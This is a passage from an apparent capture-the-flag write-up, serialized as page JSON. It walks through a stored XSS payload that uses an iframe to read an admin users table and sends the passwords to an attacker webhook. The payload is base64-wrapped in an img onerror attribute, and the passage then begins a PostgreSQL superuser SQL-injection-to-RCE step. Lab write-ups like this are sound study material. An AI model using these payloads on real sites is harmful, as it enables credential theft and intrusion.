},[2472],{"type":39,"value
":2473},"width",{"type":34,"tag":315,"props":2475,"children":2476},{"style":338},[2477],{"type":39,"value":449},{"type":34,"tag":315,"props":2479,"children":2480},{"style":1463},[2481],{"type":39,"value":2482}," 800",{"type":34,"tag":315,"props":2484,"children":2485},{"style":338},[2486],{"type":39,"value":468},{"type":34,"tag":315,"props":2488,"children":2489},{"class":317,"line":471},[2490,2494,2498,2503,2507,2512],{"type":34,"tag":315,"props":2491,"children":2492},{"style":332},[2493],{"type":39,"value":2412},{"type":34,"tag":315,"props":2495,"children":2496},{"style":338},[2497],{"type":39,"value":66},{"type":34,"tag":315,"props":2499,"children":2500},{"style":332},[2501],{"type":39,"value":2502},"height",{"type":34,"tag":315,"props":2504,"children":2505},{"style":338},[2506],{"type":39,"value":449},{"type":34,"tag":315,"props":2508,"children":2509},{"style":1463},[2510],{"type":39,"value":2511}," 600",{"type":34,"tag":315,"props":2513,"children":2514},{"style":338},[2515],{"type":39,"value":468},{"type":34,"tag":315,"props":2517,"children":2518},{"class":317,"line":485},[2519,2524,2528,2532,2536,2541,2545,2549],{"type":34,"tag":315,"props":2520,"children":2521},{"style":332},[2522],{"type":39,"value":2523},"document",{"type":34,"tag":315,"props":2525,"children":2526},{"style":338},[2527],{"type":39,"value":66},{"type":34,"tag":315,"props":2529,"children":2530},{"style":332},[2531],{"type":39,"value":463},{"type":34,"tag":315,"props":2533,"children":2534},{"style":338},[2535],{"type":39,"value":66},{"type":34,"tag":315,"props":2537,"children":2538},{"style":343},[2539],{"type":39,"value":2540},"appendChild",{"type":34,"tag":315,"props":2542,"children":2543},{"style":338},[2544],{"type":39,"value":351},{"type":34,"tag":315,"props":2546,"children":2547},{"style":332},[2548],{"type":39,"value":2412},{"type":34,"tag":315,"props":2550,"children":2551},{"style":338},[2552],{"type":39,"value":616},{"type":34,"tag":48,"props":2554,"children":2555},{},[2556],{"type":39,"
value":2557},"Result:",{"type":34,"tag":73,"props":2559,"children":2561},{"imgSrc":2560},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1743104159/writeups/aurors-archive/iframe_first_step.webp",[],{"type":34,"tag":48,"props":2563,"children":2564},{},[2565],{"type":39,"value":2566},"We will now click on the last element of the list which is the users table:",{"type":34,"tag":301,"props":2568,"children":2569},{"lang":303},[2570],{"type":34,"tag":306,"props":2571,"children":2573},{"className":308,"code":2572,"language":303,"meta":7,"style":7},"document.querySelector('iframe').contentWindow.document.querySelectorAll('li').at(-1).click()\n",[2574],{"type":34,"tag":59,"props":2575,"children":2576},{"__ignoreMap":7},[2577],{"type":34,"tag":315,"props":2578,"children":2579},{"class":317,"line":318},[2580,2584,2588,2593,2597,2601,2605,2609,2613,2618,2622,2626,2630,2635,2639,2643,2647,2651,2655,2660,2664,2669,2673,2677,2682],{"type":34,"tag":315,"props":2581,"children":2582},{"style":332},[2583],{"type":39,"value":2523},{"type":34,"tag":315,"props":2585,"children":2586},{"style":338},[2587],{"type":39,"value":66},{"type":34,"tag":315,"props":2589,"children":2590},{"style":343},[2591],{"type":39,"value":2592},"querySelector",{"type":34,"tag":315,"props":2594,"children":2595},{"style":338},[2596],{"type":39,"value":351},{"type":34,"tag":315,"props":2598,"children":2599},{"style":354},[2600],{"type":39,"value":852},{"type":34,"tag":315,"props":2602,"children":2603},{"style":360},[2604],{"type":39,"value":2412},{"type":34,"tag":315,"props":2606,"children":2607},{"style":354},[2608],{"type":39,"value":852},{"type":34,"tag":315,"props":2610,"children":2611},{"style":338},[2612],{"type":39,"value":1514},{"type":34,"tag":315,"props":2614,"children":2615},{"style":332},[2616],{"type":39,"value":2617},"contentWindow",{"type":34,"tag":315,"props":2619,"children":2620},{"style":338},[2621],{"type":39,"value":66},{"type":34,"tag":315,"props":2623,"children":2624},{"style":332},[2625
],{"type":39,"value":2523},{"type":34,"tag":315,"props":2627,"children":2628},{"style":338},[2629],{"type":39,"value":66},{"type":34,"tag":315,"props":2631,"children":2632},{"style":343},[2633],{"type":39,"value":2634},"querySelectorAll",{"type":34,"tag":315,"props":2636,"children":2637},{"style":338},[2638],{"type":39,"value":351},{"type":34,"tag":315,"props":2640,"children":2641},{"style":354},[2642],{"type":39,"value":852},{"type":34,"tag":315,"props":2644,"children":2645},{"style":360},[2646],{"type":39,"value":83},{"type":34,"tag":315,"props":2648,"children":2649},{"style":354},[2650],{"type":39,"value":852},{"type":34,"tag":315,"props":2652,"children":2653},{"style":338},[2654],{"type":39,"value":1514},{"type":34,"tag":315,"props":2656,"children":2657},{"style":343},[2658],{"type":39,"value":2659},"at",{"type":34,"tag":315,"props":2661,"children":2662},{"style":338},[2663],{"type":39,"value":351},{"type":34,"tag":315,"props":2665,"children":2666},{"style":384},[2667],{"type":39,"value":2668},"-",{"type":34,"tag":315,"props":2670,"children":2671},{"style":1463},[2672],{"type":39,"value":2105},{"type":34,"tag":315,"props":2674,"children":2675},{"style":338},[2676],{"type":39,"value":1514},{"type":34,"tag":315,"props":2678,"children":2679},{"style":343},[2680],{"type":39,"value":2681},"click",{"type":34,"tag":315,"props":2683,"children":2684},{"style":338},[2685],{"type":39,"value":2686},"()\n",{"type":34,"tag":48,"props":2688,"children":2689},{},[2690],{"type":39,"value":2557},{"type":34,"tag":73,"props":2692,"children":2694},{"imgSrc":2693},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1743104209/writeups/aurors-archive/display_user_table.webp",[],{"type":34,"tag":48,"props":2696,"children":2697},{},[2698],{"type":39,"value":2699},"We can now retrieve the table with the following 
line:",{"type":34,"tag":301,"props":2701,"children":2702},{"lang":303},[2703],{"type":34,"tag":306,"props":2704,"children":2706},{"className":308,"code":2705,"language":303,"meta":7,"style":7},">> document.querySelector('iframe').contentWindow.document.body.querySelector('table').innerHTML\n\"\u003Cthead>\u003Ctr>\u003Cth>id\u003C/th>\u003Cth>username\u003C/th>\u003Cth>password\u003C/th>\u003C/tr>\u003C/thead> \u003Ctbody>\u003Ctr>\u003Ctd>1\u003C/td>\u003Ctd>admin\u003C/td>\u003Ctd>admin\u003C/td>\u003C/tr>\u003C/tbody>\" \n",[2707],{"type":34,"tag":59,"props":2708,"children":2709},{"__ignoreMap":7},[2710,2804],{"type":34,"tag":315,"props":2711,"children":2712},{"class":317,"line":318},[2713,2718,2722,2726,2730,2734,2738,2742,2746,2750,2754,2758,2762,2766,2770,2774,2778,2782,2786,2791,2795,2799],{"type":34,"tag":315,"props":2714,"children":2715},{"style":384},[2716],{"type":39,"value":2717},">>",{"type":34,"tag":315,"props":2719,"children":2720},{"style":332},[2721],{"type":39,"value":2390},{"type":34,"tag":315,"props":2723,"children":2724},{"style":338},[2725],{"type":39,"value":66},{"type":34,"tag":315,"props":2727,"children":2728},{"style":343},[2729],{"type":39,"value":2592},{"type":34,"tag":315,"props":2731,"children":2732},{"style":338},[2733],{"type":39,"value":351},{"type":34,"tag":315,"props":2735,"children":2736},{"style":354},[2737],{"type":39,"value":852},{"type":34,"tag":315,"props":2739,"children":2740},{"style":360},[2741],{"type":39,"value":2412},{"type":34,"tag":315,"props":2743,"children":2744},{"style":354},[2745],{"type":39,"value":852},{"type":34,"tag":315,"props":2747,"children":2748},{"style":338},[2749],{"type":39,"value":1514},{"type":34,"tag":315,"props":2751,"children":2752},{"style":332},[2753],{"type":39,"value":2617},{"type":34,"tag":315,"props":2755,"children":2756},{"style":338},[2757],{"type":39,"value":66},{"type":34,"tag":315,"props":2759,"children":2760},{"style":332},[2761],{"type":39,"value":2523},{"type":34,"tag":315,"props":2
763,"children":2764},{"style":338},[2765],{"type":39,"value":66},{"type":34,"tag":315,"props":2767,"children":2768},{"style":332},[2769],{"type":39,"value":463},{"type":34,"tag":315,"props":2771,"children":2772},{"style":338},[2773],{"type":39,"value":66},{"type":34,"tag":315,"props":2775,"children":2776},{"style":343},[2777],{"type":39,"value":2592},{"type":34,"tag":315,"props":2779,"children":2780},{"style":338},[2781],{"type":39,"value":351},{"type":34,"tag":315,"props":2783,"children":2784},{"style":354},[2785],{"type":39,"value":852},{"type":34,"tag":315,"props":2787,"children":2788},{"style":360},[2789],{"type":39,"value":2790},"table",{"type":34,"tag":315,"props":2792,"children":2793},{"style":354},[2794],{"type":39,"value":852},{"type":34,"tag":315,"props":2796,"children":2797},{"style":338},[2798],{"type":39,"value":1514},{"type":34,"tag":315,"props":2800,"children":2801},{"style":332},[2802],{"type":39,"value":2803},"innerHTML\n",{"type":34,"tag":315,"props":2805,"children":2806},{"class":317,"line":328},[2807,2811,2816],{"type":34,"tag":315,"props":2808,"children":2809},{"style":354},[2810],{"type":39,"value":357},{"type":34,"tag":315,"props":2812,"children":2813},{"style":360},[2814],{"type":39,"value":2815},"\u003Cthead>\u003Ctr>\u003Cth>id\u003C/th>\u003Cth>username\u003C/th>\u003Cth>password\u003C/th>\u003C/tr>\u003C/thead> \u003Ctbody>\u003Ctr>\u003Ctd>1\u003C/td>\u003Ctd>admin\u003C/td>\u003Ctd>admin\u003C/td>\u003C/tr>\u003C/tbody>",{"type":34,"tag":315,"props":2817,"children":2818},{"style":354},[2819],{"type":39,"value":2820},"\"\n",{"type":34,"tag":48,"props":2822,"children":2823},{},[2824],{"type":39,"value":2825},"After that, we can send it to our webhook. 
Below is the final payload. The two fixed one-second timeouts give the /admin iframe time to load and the users table time to render after the click; a more robust version would wait for the iframe load event instead of guessing. Two details worth noting: the iframe points at /admin on the same origin as the XSS, which is the only reason contentWindow.document is readable at all, and btoa() output may contain '+' characters, which a query-string parser decodes as spaces, so wrapping the base64 in encodeURIComponent() avoids corrupting the exfiltrated data:
882],{"type":39,"value":616},{"type":34,"tag":315,"props":2884,"children":2885},{"class":317,"line":328},[2886,2890,2894,2898,2902,2906,2910,2914],{"type":34,"tag":315,"props":2887,"children":2888},{"style":332},[2889],{"type":39,"value":2412},{"type":34,"tag":315,"props":2891,"children":2892},{"style":338},[2893],{"type":39,"value":66},{"type":34,"tag":315,"props":2895,"children":2896},{"style":332},[2897],{"type":39,"value":2436},{"type":34,"tag":315,"props":2899,"children":2900},{"style":338},[2901],{"type":39,"value":449},{"type":34,"tag":315,"props":2903,"children":2904},{"style":354},[2905],{"type":39,"value":505},{"type":34,"tag":315,"props":2907,"children":2908},{"style":360},[2909],{"type":39,"value":2449},{"type":34,"tag":315,"props":2911,"children":2912},{"style":354},[2913],{"type":39,"value":534},{"type":34,"tag":315,"props":2915,"children":2916},{"style":338},[2917],{"type":39,"value":468},{"type":34,"tag":315,"props":2919,"children":2920},{"class":317,"line":423},[2921,2925,2929,2933,2937,2941,2945,2949],{"type":34,"tag":315,"props":2922,"children":2923},{"style":332},[2924],{"type":39,"value":2523},{"type":34,"tag":315,"props":2926,"children":2927},{"style":338},[2928],{"type":39,"value":66},{"type":34,"tag":315,"props":2930,"children":2931},{"style":332},[2932],{"type":39,"value":463},{"type":34,"tag":315,"props":2934,"children":2935},{"style":338},[2936],{"type":39,"value":66},{"type":34,"tag":315,"props":2938,"children":2939},{"style":343},[2940],{"type":39,"value":2540},{"type":34,"tag":315,"props":2942,"children":2943},{"style":338},[2944],{"type":39,"value":351},{"type":34,"tag":315,"props":2946,"children":2947},{"style":332},[2948],{"type":39,"value":2412},{"type":34,"tag":315,"props":2950,"children":2951},{"style":338},[2952],{"type":39,"value":616},{"type":34,"tag":315,"props":2954,"children":2955},{"class":317,"line":471},[2956,2961,2966,2970],{"type":34,"tag":315,"props":2957,"children":2958},{"style":343},[2959],{"type":39,"value":2960},"
setTimeout",{"type":34,"tag":315,"props":2962,"children":2963},{"style":338},[2964],{"type":39,"value":2965},"(()",{"type":34,"tag":315,"props":2967,"children":2968},{"style":338},[2969],{"type":39,"value":415},{"type":34,"tag":315,"props":2971,"children":2972},{"style":338},[2973],{"type":39,"value":420},{"type":34,"tag":315,"props":2975,"children":2976},{"class":317,"line":485},[2977,2982,2986,2990,2994,2998,3002,3006,3010,3014,3018,3022,3026,3030,3034,3038,3042,3046,3051,3056,3061,3065],{"type":34,"tag":315,"props":2978,"children":2979},{"style":332},[2980],{"type":39,"value":2981},"  document",{"type":34,"tag":315,"props":2983,"children":2984},{"style":338},[2985],{"type":39,"value":66},{"type":34,"tag":315,"props":2987,"children":2988},{"style":343},[2989],{"type":39,"value":2592},{"type":34,"tag":315,"props":2991,"children":2992},{"style":338},[2993],{"type":39,"value":351},{"type":34,"tag":315,"props":2995,"children":2996},{"style":354},[2997],{"type":39,"value":852},{"type":34,"tag":315,"props":2999,"children":3000},{"style":360},[3001],{"type":39,"value":2412},{"type":34,"tag":315,"props":3003,"children":3004},{"style":354},[3005],{"type":39,"value":852},{"type":34,"tag":315,"props":3007,"children":3008},{"style":338},[3009],{"type":39,"value":1514},{"type":34,"tag":315,"props":3011,"children":3012},{"style":332},[3013],{"type":39,"value":2617},{"type":34,"tag":315,"props":3015,"children":3016},{"style":338},[3017],{"type":39,"value":66},{"type":34,"tag":315,"props":3019,"children":3020},{"style":332},[3021],{"type":39,"value":2523},{"type":34,"tag":315,"props":3023,"children":3024},{"style":338},[3025],{"type":39,"value":66},{"type":34,"tag":315,"props":3027,"children":3028},{"style":343},[3029],{"type":39,"value":2634},{"type":34,"tag":315,"props":3031,"children":3032},{"style":338},[3033],{"type":39,"value":351},{"type":34,"tag":315,"props":3035,"children":3036},{"style":354},[3037],{"type":39,"value":852},{"type":34,"tag":315,"props":3039,"children":304
0},{"style":360},[3041],{"type":39,"value":83},{"type":34,"tag":315,"props":3043,"children":3044},{"style":354},[3045],{"type":39,"value":852},{"type":34,"tag":315,"props":3047,"children":3048},{"style":338},[3049],{"type":39,"value":3050},")[",{"type":34,"tag":315,"props":3052,"children":3053},{"style":1463},[3054],{"type":39,"value":3055},"3",{"type":34,"tag":315,"props":3057,"children":3058},{"style":338},[3059],{"type":39,"value":3060},"].",{"type":34,"tag":315,"props":3062,"children":3063},{"style":343},[3064],{"type":39,"value":2681},{"type":34,"tag":315,"props":3066,"children":3067},{"style":338},[3068],{"type":39,"value":2686},{"type":34,"tag":315,"props":3070,"children":3071},{"class":317,"line":541},[3072,3077,3081,3085],{"type":34,"tag":315,"props":3073,"children":3074},{"style":343},[3075],{"type":39,"value":3076},"  setTimeout",{"type":34,"tag":315,"props":3078,"children":3079},{"style":338},[3080],{"type":39,"value":2965},{"type":34,"tag":315,"props":3082,"children":3083},{"style":338},[3084],{"type":39,"value":415},{"type":34,"tag":315,"props":3086,"children":3087},{"style":338},[3088],{"type":39,"value":420},{"type":34,"tag":315,"props":3090,"children":3091},{"class":317,"line":551},[3092,3097,3101,3106,3110,3114,3119,3123,3128,3133,3137,3141,3145,3149,3153,3157,3161,3165,3169,3173,3177,3181,3185,3189,3193,3197,3201,3205,3209,3213,3217,3222],{"type":34,"tag":315,"props":3093,"children":3094},{"style":332},[3095],{"type":39,"value":3096},"    
window",{"type":34,"tag":315,"props":3098,"children":3099},{"style":338},[3100],{"type":39,"value":66},{"type":34,"tag":315,"props":3102,"children":3103},{"style":332},[3104],{"type":39,"value":3105},"location",{"type":34,"tag":315,"props":3107,"children":3108},{"style":338},[3109],{"type":39,"value":449},{"type":34,"tag":315,"props":3111,"children":3112},{"style":354},[3113],{"type":39,"value":1553},{"type":34,"tag":315,"props":3115,"children":3116},{"style":360},[3117],{"type":39,"value":3118},"//\u003CWEBHOOK>/?userstable=",{"type":34,"tag":315,"props":3120,"children":3121},{"style":354},[3122],{"type":39,"value":852},{"type":34,"tag":315,"props":3124,"children":3125},{"style":384},[3126],{"type":39,"value":3127}," +",{"type":34,"tag":315,"props":3129,"children":3130},{"style":343},[3131],{"type":39,"value":3132}," btoa",{"type":34,"tag":315,"props":3134,"children":3135},{"style":338},[3136],{"type":39,"value":351},{"type":34,"tag":315,"props":3138,"children":3139},{"style":332},[3140],{"type":39,"value":2523},{"type":34,"tag":315,"props":3142,"children":3143},{"style":338},[3144],{"type":39,"value":66},{"type":34,"tag":315,"props":3146,"children":3147},{"style":343},[3148],{"type":39,"value":2592},{"type":34,"tag":315,"props":3150,"children":3151},{"style":338},[3152],{"type":39,"value":351},{"type":34,"tag":315,"props":3154,"children":3155},{"style":354},[3156],{"type":39,"value":852},{"type":34,"tag":315,"props":3158,"children":3159},{"style":360},[3160],{"type":39,"value":2412},{"type":34,"tag":315,"props":3162,"children":3163},{"style":354},[3164],{"type":39,"value":852},{"type":34,"tag":315,"props":3166,"children":3167},{"style":338},[3168],{"type":39,"value":1514},{"type":34,"tag":315,"props":3170,"children":3171},{"style":332},[3172],{"type":39,"value":2617},{"type":34,"tag":315,"props":3174,"children":3175},{"style":338},[3176],{"type":39,"value":66},{"type":34,"tag":315,"props":3178,"children":3179},{"style":332},[3180],{"type":39,"value":2523},{"type":
34,"tag":315,"props":3182,"children":3183},{"style":338},[3184],{"type":39,"value":66},{"type":34,"tag":315,"props":3186,"children":3187},{"style":332},[3188],{"type":39,"value":463},{"type":34,"tag":315,"props":3190,"children":3191},{"style":338},[3192],{"type":39,"value":66},{"type":34,"tag":315,"props":3194,"children":3195},{"style":343},[3196],{"type":39,"value":2592},{"type":34,"tag":315,"props":3198,"children":3199},{"style":338},[3200],{"type":39,"value":351},{"type":34,"tag":315,"props":3202,"children":3203},{"style":354},[3204],{"type":39,"value":852},{"type":34,"tag":315,"props":3206,"children":3207},{"style":360},[3208],{"type":39,"value":2790},{"type":34,"tag":315,"props":3210,"children":3211},{"style":354},[3212],{"type":39,"value":852},{"type":34,"tag":315,"props":3214,"children":3215},{"style":338},[3216],{"type":39,"value":1514},{"type":34,"tag":315,"props":3218,"children":3219},{"style":332},[3220],{"type":39,"value":3221},"innerHTML",{"type":34,"tag":315,"props":3223,"children":3224},{"style":338},[3225],{"type":39,"value":3226},")\n",{"type":34,"tag":315,"props":3228,"children":3229},{"class":317,"line":570},[3230,3235,3240],{"type":34,"tag":315,"props":3231,"children":3232},{"style":338},[3233],{"type":39,"value":3234},"  },",{"type":34,"tag":315,"props":3236,"children":3237},{"style":1463},[3238],{"type":39,"value":3239}," 1000",{"type":34,"tag":315,"props":3241,"children":3242},{"style":338},[3243],{"type":39,"value":616},{"type":34,"tag":315,"props":3245,"children":3246},{"class":317,"line":578},[3247,3252,3256],{"type":34,"tag":315,"props":3248,"children":3249},{"style":338},[3250],{"type":39,"value":3251},"},",{"type":34,"tag":315,"props":3253,"children":3254},{"style":1463},[3255],{"type":39,"value":3239},{"type":34,"tag":315,"props":3257,"children":3258},{"style":338},[3259],{"type":39,"value":616},{"type":34,"tag":48,"props":3261,"children":3262},{},[3263],{"type":39,"value":3264},"To more easily trigger our payload, we will encode it in 
base64 and evaluate it with eval(atob(...)): the base64 wrapper keeps quotes and angle brackets out of the onerror attribute and the JSON body, so nothing has to be escaped twice. We can then send it and add it to a bid like this:
",{"type":34,"tag":315,"props":3288,"children":3289},{"style":475},[3290],{"type":39,"value":2186},{"type":34,"tag":315,"props":3292,"children":3293},{"style":701},[3294],{"type":39,"value":2191},{"type":34,"tag":315,"props":3296,"children":3297},{"style":1463},[3298],{"type":39,"value":2196},{"type":34,"tag":315,"props":3300,"children":3301},{"class":317,"line":328},[3302,3306],{"type":34,"tag":315,"props":3303,"children":3304},{"style":475},[3305],{"type":39,"value":2204},{"type":34,"tag":315,"props":3307,"children":3308},{"style":360},[3309],{"type":39,"value":2209},{"type":34,"tag":315,"props":3311,"children":3312},{"class":317,"line":423},[3313,3317],{"type":34,"tag":315,"props":3314,"children":3315},{"style":475},[3316],{"type":39,"value":2217},{"type":34,"tag":315,"props":3318,"children":3319},{"style":360},[3320],{"type":39,"value":2222},{"type":34,"tag":315,"props":3322,"children":3323},{"class":317,"line":471},[3324,3328],{"type":34,"tag":315,"props":3325,"children":3326},{"style":475},[3327],{"type":39,"value":2230},{"type":34,"tag":315,"props":3329,"children":3330},{"style":360},[3331],{"type":39,"value":2235},{"type":34,"tag":315,"props":3333,"children":3334},{"class":317,"line":485},[3335,3339],{"type":34,"tag":315,"props":3336,"children":3337},{"style":475},[3338],{"type":39,"value":2243},{"type":34,"tag":315,"props":3340,"children":3341},{"style":360},[3342],{"type":39,"value":2248},{"type":34,"tag":315,"props":3344,"children":3345},{"class":317,"line":541},[3346],{"type":34,"tag":315,"props":3347,"children":3348},{"emptyLinePlaceholder":545},[3349],{"type":39,"value":548},{"type":34,"tag":315,"props":3351,"children":3352},{"class":317,"line":551},[3353,3357,3361,3365,3369,3373,3377,3381,3385,3389,3393,3397,3401,3405,3409,3413,3417,3422,3426],{"type":34,"tag":315,"props":3354,"children":3355},{"style":338},[3356],{"type":39,"value":2066},{"type":34,"tag":315,"props":3358,"children":3359},{"style":2069},[3360],{"type":39,"value":357},{"type":34,"tag":
315,"props":3362,"children":3363},{"style":642},[3364],{"type":39,"value":1446},{"type":34,"tag":315,"props":3366,"children":3367},{"style":2069},[3368],{"type":39,"value":357},{"type":34,"tag":315,"props":3370,"children":3371},{"style":338},[3372],{"type":39,"value":2084},{"type":34,"tag":315,"props":3374,"children":3375},{"style":2069},[3376],{"type":39,"value":357},{"type":34,"tag":315,"props":3378,"children":3379},{"style":642},[3380],{"type":39,"value":1455},{"type":34,"tag":315,"props":3382,"children":3383},{"style":2069},[3384],{"type":39,"value":357},{"type":34,"tag":315,"props":3386,"children":3387},{"style":338},[3388],{"type":39,"value":650},{"type":34,"tag":315,"props":3390,"children":3391},{"style":1463},[3392],{"type":39,"value":2105},{"type":34,"tag":315,"props":3394,"children":3395},{"style":338},[3396],{"type":39,"value":372},{"type":34,"tag":315,"props":3398,"children":3399},{"style":2069},[3400],{"type":39,"value":357},{"type":34,"tag":315,"props":3402,"children":3403},{"style":642},[3404],{"type":39,"value":2118},{"type":34,"tag":315,"props":3406,"children":3407},{"style":2069},[3408],{"type":39,"value":357},{"type":34,"tag":315,"props":3410,"children":3411},{"style":338},[3412],{"type":39,"value":650},{"type":34,"tag":315,"props":3414,"children":3415},{"style":354},[3416],{"type":39,"value":357},{"type":34,"tag":315,"props":3418,"children":3419},{"style":360},[3420],{"type":39,"value":3421},"a'>\u003Cimg src=x onerror='eval(atob(`bGV0IGlmcmFtZSA9[..SNIP..]pOw==`))'>'>",{"type":34,"tag":315,"props":3423,"children":3424},{"style":354},[3425],{"type":39,"value":357},{"type":34,"tag":315,"props":3427,"children":3428},{"style":338},[3429],{"type":39,"value":3430}," }}\n",{"type":34,"tag":48,"props":3432,"children":3433},{},[3434],{"type":39,"value":3435},"And finally call the bot on the page that has just been polluted with our XSS 
payload:",{"type":34,"tag":73,"props":3437,"children":3439},{"imgSrc":3438},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1743110972/writeups/aurors-archive/send_to_bot.webp",[],{"type":34,"tag":48,"props":3441,"children":3442},{},[3443],{"type":39,"value":3444},"We can see that in our webhook we have received the passwords from the users table. We can now use the admin password to exploit the SQL injection.",{"type":34,"tag":73,"props":3446,"children":3449},{"imgSrc":3447,":width":3448},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1743111675/writeups/aurors-archive/collab_get_passwords.webp","800",[],{"type":34,"tag":41,"props":3451,"children":3453},{"id":3452},"sql-injection-to-rce",[3454],{"type":39,"value":3455},"SQL Injection to RCE",{"type":34,"tag":48,"props":3457,"children":3458},{},[3459],{"type":39,"value":3460},"In the first part, we saw that in the administration section, there was an SQL injection. We also saw that the database is PostgreSQL 17, and we can see in the entrypoint that the user has superuser roles.",{"type":34,"tag":301,"props":3462,"children":3464},{"lang":3463},"bash",[3465],{"type":34,"tag":306,"props":3466,"children":3469},{"className":3467,"code":3468,"language":3463,"meta":7,"style":7},"language-bash shiki shiki-themes vitesse-dark","[..SNIP..]\n# Set up database and create a new user (appuser) with complete access to appdb and the selected LO functions\necho \"[+] Setting up database and user...\"\nsu - postgres -c \"psql -v ON_ERROR_STOP=1 \u003C\u003CEOF\nDROP USER IF EXISTS appuser;\nCREATE USER appuser WITH PASSWORD '$APPUSER_PASSWORD' SUPERUSER;\nDROP DATABASE IF EXISTS appdb;\nCREATE DATABASE appdb OWNER appuser;\n\\c appdb\nGRANT ALL PRIVILEGES ON ALL TABLES IN SCHEMA public TO appuser;\nALTER DEFAULT PRIVILEGES IN SCHEMA public GRANT ALL PRIVILEGES ON TABLES TO appuser;\nGRANT ALL PRIVILEGES ON ALL SEQUENCES IN SCHEMA public TO appuser;\nALTER DEFAULT PRIVILEGES IN SCHEMA public GRANT ALL PRIVILEGES ON 
SEQUENCES TO appuser;\nEOF\"\n[..SNIP..]\n",[3470],{"type":34,"tag":59,"props":3471,"children":3472},{"__ignoreMap":7},[3473,3491,3499,3521,3554,3562,3570,3578,3586,3594,3602,3610,3618,3626,3638],{"type":34,"tag":315,"props":3474,"children":3475},{"class":317,"line":318},[3476,3481,3486],{"type":34,"tag":315,"props":3477,"children":3478},{"style":338},[3479],{"type":39,"value":3480},"[",{"type":34,"tag":315,"props":3482,"children":3483},{"style":701},[3484],{"type":39,"value":3485},"..SNIP..",{"type":34,"tag":315,"props":3487,"children":3488},{"style":338},[3489],{"type":39,"value":3490},"]\n",{"type":34,"tag":315,"props":3492,"children":3493},{"class":317,"line":328},[3494],{"type":34,"tag":315,"props":3495,"children":3496},{"style":322},[3497],{"type":39,"value":3498},"# Set up database and create a new user (appuser) with complete access to appdb and the selected LO functions\n",{"type":34,"tag":315,"props":3500,"children":3501},{"class":317,"line":423},[3502,3507,3512,3517],{"type":34,"tag":315,"props":3503,"children":3504},{"style":642},[3505],{"type":39,"value":3506},"echo",{"type":34,"tag":315,"props":3508,"children":3509},{"style":354},[3510],{"type":39,"value":3511}," \"",{"type":34,"tag":315,"props":3513,"children":3514},{"style":360},[3515],{"type":39,"value":3516},"[+] Setting up database and user...",{"type":34,"tag":315,"props":3518,"children":3519},{"style":354},[3520],{"type":39,"value":2820},{"type":34,"tag":315,"props":3522,"children":3523},{"class":317,"line":471},[3524,3529,3534,3539,3545,3549],{"type":34,"tag":315,"props":3525,"children":3526},{"style":343},[3527],{"type":39,"value":3528},"su",{"type":34,"tag":315,"props":3530,"children":3531},{"style":360},[3532],{"type":39,"value":3533}," -",{"type":34,"tag":315,"props":3535,"children":3536},{"style":360},[3537],{"type":39,"value":3538}," postgres",{"type":34,"tag":315,"props":3540,"children":3542},{"style":3541},"--shiki-default:#C99076",[3543],{"type":39,"value":3544}," 
-c",{"type":34,"tag":315,"props":3546,"children":3547},{"style":354},[3548],{"type":39,"value":3511},{"type":34,"tag":315,"props":3550,"children":3551},{"style":360},[3552],{"type":39,"value":3553},"psql -v ON_ERROR_STOP=1 \u003C\u003CEOF\n",{"type":34,"tag":315,"props":3555,"children":3556},{"class":317,"line":485},[3557],{"type":34,"tag":315,"props":3558,"children":3559},{"style":360},[3560],{"type":39,"value":3561},"DROP USER IF EXISTS appuser;\n",{"type":34,"tag":315,"props":3563,"children":3564},{"class":317,"line":541},[3565],{"type":34,"tag":315,"props":3566,"children":3567},{"style":360},[3568],{"type":39,"value":3569},"CREATE USER appuser WITH PASSWORD '$APPUSER_PASSWORD' SUPERUSER;\n",{"type":34,"tag":315,"props":3571,"children":3572},{"class":317,"line":551},[3573],{"type":34,"tag":315,"props":3574,"children":3575},{"style":360},[3576],{"type":39,"value":3577},"DROP DATABASE IF EXISTS appdb;\n",{"type":34,"tag":315,"props":3579,"children":3580},{"class":317,"line":570},[3581],{"type":34,"tag":315,"props":3582,"children":3583},{"style":360},[3584],{"type":39,"value":3585},"CREATE DATABASE appdb OWNER appuser;\n",{"type":34,"tag":315,"props":3587,"children":3588},{"class":317,"line":578},[3589],{"type":34,"tag":315,"props":3590,"children":3591},{"style":360},[3592],{"type":39,"value":3593},"\\c appdb\n",{"type":34,"tag":315,"props":3595,"children":3596},{"class":317,"line":619},[3597],{"type":34,"tag":315,"props":3598,"children":3599},{"style":360},[3600],{"type":39,"value":3601},"GRANT ALL PRIVILEGES ON ALL TABLES IN SCHEMA public TO appuser;\n",{"type":34,"tag":315,"props":3603,"children":3604},{"class":317,"line":671},[3605],{"type":34,"tag":315,"props":3606,"children":3607},{"style":360},[3608],{"type":39,"value":3609},"ALTER DEFAULT PRIVILEGES IN SCHEMA public GRANT ALL PRIVILEGES ON TABLES TO 
appuser;\n",{"type":34,"tag":315,"props":3611,"children":3612},{"class":317,"line":680},[3613],{"type":34,"tag":315,"props":3614,"children":3615},{"style":360},[3616],{"type":39,"value":3617},"GRANT ALL PRIVILEGES ON ALL SEQUENCES IN SCHEMA public TO appuser;\n",{"type":34,"tag":315,"props":3619,"children":3620},{"class":317,"line":697},[3621],{"type":34,"tag":315,"props":3622,"children":3623},{"style":360},[3624],{"type":39,"value":3625},"ALTER DEFAULT PRIVILEGES IN SCHEMA public GRANT ALL PRIVILEGES ON SEQUENCES TO appuser;\n",{"type":34,"tag":315,"props":3627,"children":3628},{"class":317,"line":707},[3629,3634],{"type":34,"tag":315,"props":3630,"children":3631},{"style":360},[3632],{"type":39,"value":3633},"EOF",{"type":34,"tag":315,"props":3635,"children":3636},{"style":354},[3637],{"type":39,"value":2820},{"type":34,"tag":315,"props":3639,"children":3640},{"class":317,"line":1805},[3641,3645,3649],{"type":34,"tag":315,"props":3642,"children":3643},{"style":338},[3644],{"type":39,"value":3480},{"type":34,"tag":315,"props":3646,"children":3647},{"style":701},[3648],{"type":39,"value":3485},{"type":34,"tag":315,"props":3650,"children":3651},{"style":338},[3652],{"type":39,"value":3490},{"type":34,"tag":48,"props":3654,"children":3655},{},[3656,3658,3667],{"type":39,"value":3657},"With superuser account, It is then possible to use large objects. Briefly, large objects are types in PostgreSQL that allow storing larger quantities of data than classical types like text or bytea. Large objects also allow reading and writing to the filesystem. 
